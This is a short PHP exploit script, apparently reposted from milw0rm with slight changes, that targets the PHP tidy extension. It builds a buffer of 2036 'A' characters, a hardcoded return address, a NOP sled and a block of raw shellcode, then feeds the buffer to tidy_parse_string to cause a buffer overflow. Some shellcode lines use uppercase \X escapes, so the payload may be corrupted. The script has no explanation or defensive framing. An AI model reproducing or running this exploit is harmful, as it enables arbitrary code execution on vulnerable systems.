Copy Code code as follows:
<?php
if (!extension_loaded ("tidy")) {die ("You need tidy extension loaded!");}
$scode =
"\xfc\xbb\xc7\xc4\x05\xc9\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85".
"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x3b\x2c\x41\xc9\xc3\xad\xc1".
"\x8c\xff\x26\xa9\x0b\x87\x39\xbd\x9f\x38\x22\xca\xff\xe6\x53\x27".
"\xb6\x6d\x67\x3c\x48\x9f\xb9\x82\xd2\xf3\x3e\xc2\x91\x0c\xfe\x09".
"\x54\x13\xc2\x65\x93\x28\x96\x5d\x58\x3b\xf3\x15\x3f\xe7\xfa\xc2".
"\xa6\x6c\xf0\x5f\xac\x2d\x15\x61\x59\x5a\x39\xea\x9c\xb7\xcb\xb0".
"\xba\x43\x0f\x79\x03\x2f\x04\x3a\xb3\x2a\xda\xc3\xbf\xbf\x9b\x3f".
"\x4b\xcf\x07\xed\xc0\x47\x30\x06\xdf\x1c\xc0\x68\xe0\x22\xc1\x03".
"\x89\x1e\x9e\x22\xbc\x3e\x76\xcc\xb8\x3d\xb6\xb5\x68\x29\xc7\xc0".
"\X8D\XF6\X4F\X4D\X73\X82\X9E\X3A\X73\X75\XFD\XA9\XEF\X57\X67\X4A".
"\x95\x87\x48\xc9\x75\xa9\xf3\x79\x56\x40\x8f\xe4\xe4\x8a\x1d\x86".
"\X71\XA2\XD5\X2B\XA2\X40\X77\XD5\XCA\X90\X14\X05\X24\X99\X9E\X01".
"\x1a\x3f\x39\xaa\x34\x5a\x31\x8a\xa4\xcb\xda\xab\x58\x74\x6f\x43".
"\XD4\X0A\XAF\XDA\X72\X87\XC6\XB2\X13\X24\X6D\X39\X85\XBE\XE2\XCF".
"\x36\x1e\x8f\x4e\xc0\x36\x5b\xf2\x12\xe9\xe2\xb0\x16\xf5\xe4\x38".
"\x97\xf5\xe4\x38\x97";
$EIP = "\xd8\x69\x83\x7c";
$NOP =str_repeat ("\x90", 12);
$____buff=str_repeat ("A", 2036). $EIP. $NOP. $scode;
Tidy_parse_string (1,$____buff,1);
?>
Look at the MILW0RM on the exp slightly changed down in the